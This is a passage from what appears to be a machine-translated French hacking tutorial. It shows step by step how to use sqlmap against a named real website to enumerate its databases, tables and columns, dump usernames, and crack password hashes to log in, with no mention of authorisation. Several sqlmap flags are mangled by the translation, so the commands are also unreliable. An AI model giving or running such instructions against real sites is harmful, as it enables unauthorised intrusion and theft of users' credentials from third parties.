Étape 4: Utilisation de sqlmap de le pirater
Dans votre type de terminal :
SqlMap -u http://www.angelvestgroup.com/info.php?id=1 --dbs
(http://www.angelvestgroup.com/info.php?id=1 est mon url vulnérables)
Maintenant, il va charger les bases de données...
Si tel est le cas, vous devrez sélectionner une base de données en tapant :
SqlMap -u http://www.angelvestgroup.com/info.php?id=1 angelvest_china -D--tableaux
(angelvest_china est la base de données que j’ai trouvé)
Maintenant, il va charger toutes les informations figurant dans la base de données sélectionné.
Maintenant, vous aurez besoin de sélectionner une table en tapant :
SqlMap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user--colonne
(db_user est le tableau que j’ai trouvé)
Maintenant, vous devez sélectionner une colonne en tapant :
SqlMap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user - ch. username--dump
(nom d’utilisateur est le nom de la colonne que j’ai trouvé)
Maintenant, il va vider les informations figurant dans la colonne nom d’utilisateur et : vous avez piraté il ! (Sur ce site, il y a une colonne appelée les mots de passe trop alors il vous suffit de déchiffrer les hachages dans cette colonne et boom ! Vous pouvez vous connecter.)
Félicitations ! Vous avez juste piraté un site Web avec sqlmap ! Si vous avez aimé l’instructable que vous devriez jeter un oeil à mes autres instructables trop ! Restez à l’écoute pour en savoir plus !